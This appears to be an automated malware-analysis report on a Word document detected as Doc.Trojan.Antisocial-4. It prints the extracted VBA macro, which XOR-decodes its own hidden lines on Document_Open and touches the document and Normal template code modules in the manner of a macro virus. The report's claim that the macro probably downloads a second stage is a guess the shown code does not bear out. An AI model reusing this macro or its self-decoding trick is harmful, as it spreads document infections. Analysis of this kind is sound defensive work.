MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The Document_Open macro is present and appears to be responsible for executing the malicious payload. The ClamAV detection name 'Doc.Trojan.Antisocial-4' suggests it's a known trojan. The macro's obfuscated code likely attempts to download and execute a second-stage payload.
Heuristics 3
-
ClamAV: Doc.Trojan.Antisocial-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Antisocial-4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4455 bytes |
SHA-256: bf917fdd1d56808f3b8a80ccf2ee8ea3ce4eee10b7a47eb7276cf12b7b31a4b7 |
|||
|
Detection
ClamAV:
Doc.Trojan.Antisocial-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled For d = 6 To 18: C$ = "": I = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1)) f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) Xor f: C$ = C$ & Chr(B$): Next X: A = C$ ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: Call ViewVBCode: End Sub Private Sub ViewVBCode() '6Ivroihu(UgpcHitkgjVtikvr&;&6 '5Juqljkv+FjkclwhFjks`wvljkv%8%5?%Juqljkv+SlwpvUwjq`fqljk%8%5 '5V`q%FH%8%QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi` '3Pfw#BG#>#B`wjufGl`vnfmw-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof '3Pfw#MW#>#MlqnboWfnsobwf-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof '7Ahu'c':'1'Sh'6?='D#':'%%='N':'/DJ)Knibt/c+'6.. '1g!<!Hou)Soe!+!9(!*!0;!Gns!Y!<!0!Un!Mdo)H(;!C%!<!@rb)Lhe)H-!Y-!0((!Yns!g;!B%!<!B%!'!Bis)C%(;!Odyu!Y;!@!<!B% '7SontChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)UbwkfdbKnib'c+'% %'!'a'!'F='Ib s'c '7JD':'DJ)Knibt/6+'DJ)DhrisHaKnibt. '6GB(BcjcrcJohcu&7*&GB(EishrI`Johcu<&GB(Gbb@tikUrtoha&KE '1OU/EdmdudMhodr!0-!OU/BntouNgMhodr;!OU/@eeGsnlRushof!LB '4Egpmra@kgqiajp*WeraEw$BmhaJeia>9Egpmra@kgqiajp*BqhhJeia '7 Fuebnsbu'E~'K~t'Lhqndl)))'Tr hu'Jn'Dhdlrt End Sub ' Processing file: /opt/analyzer/scan_staging/eaab36ffcb18491ab38544214e000218.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 8231 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' BoS 0x0000 ' Ld wdCancelDisabled ' Ld Application ' MemSt EnableCancelKey ' Line #1: ' StartForVariable ' Ld d ' EndForVariable ' LitDI2 0x0006 ' LitDI2 0x0012 ' For ' BoS 0x0000 ' LitStr 0x0000 "" ' St C$ ' BoS 0x0000 ' Ld d ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' Paren ' St I ' Line #2: ' Ld I ' LitDI2 0x0002 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' Paren ' St False ' BoS 0x0000 ' StartForVariable ' Ld X ' EndForVariable ' LitDI2 0x0003 ' Ld I ' FnLen ' For ' BoS 0x0000 ' Ld I ' Ld X ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' ArgsLd Asc 0x0001 ' Ld False ' Xor ' St B$ ' BoS 0x0000 ' Ld C$ ' Ld B$ ' ArgsLd Chr 0x0001 ' Concat ' St C$ ' BoS 0x0000 ' StartForVariable ' Ld X ' EndForVariable ' NextVar ' BoS 0x0000 ' Ld C$ ' St A ' Line #3: ' Ld d ' Ld A ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall ReplaceLine 0x0002 ' BoS 0x0000 ' StartForVariable ' Ld d ' EndForVariable ' NextVar ' BoS 0x0000 ' ArgsCall (Call) ViewVBCode 0x0000 ' BoS 0x0000 ' EndSub ' Line #4: ' FuncDefn (Private Sub ViewVBCode()) ' Line #5: ' QuoteRem 0x0000 0x001D "6Ivroihu(UgpcHitkgjVtikvr&;&6" ' Line #6: ' QuoteRem 0x0000 0x003C "5Juqljkv+FjkclwhFjks`wvljkv%8%5?%Juqljkv+SlwpvUwjq`fqljk%8%5" ' Line #7: ' QuoteRem 0x0000 0x0040 "5V`q%FH%8%QmlvAjfph`kq+SGUwjo`fq+SGFjhujk`kqv+Lq`h-4,+Fja`Hjapi`" ' Line #8: ' QuoteRem 0x0000 0x0042 "3Pfw#BG#>#B`wjufGl`vnfmw-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof" ' Line #9: ' QuoteRem 0x0000 0x0042 "3Pfw#MW#>#MlqnboWfnsobwf-UASqlif`w-UA@lnslmfmwp-Jwfn+2*-@lgfNlgvof" ' Line #10: ' QuoteRem 0x0000 0x002F "7Ahu'c':'1'Sh'6?='D#':'%%='N':'/DJ)Knibt/c+'6.." ' Line #11: ' QuoteRem 0x0000 0x006B "1g!<!Hou)Soe!+!9(!*!0;!Gns!Y!<!0!Un!Mdo)H(;!C%!<!@rb)Lhe)H-!Y-!0((!Yns!g;!B%!<!B%!'!Bis)C%(;!Odyu!Y;!@!<!B%" ' Line #12: ' QuoteRem 0x0000 0x005A "7SontChdrjbis)QEWuhmbds)QEDhjwhibist)Nsbj/6.)DhcbJhcrkb)UbwkfdbKnib'c+'% %'!'a'!'F='Ib s'c" ' Line #13: ' QuoteRem 0x0000 0x0022 "7JD':'DJ)Knibt/6+'DJ)DhrisHaKnibt." ' Line #14: ' QuoteRem 0x0000 0x0037 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.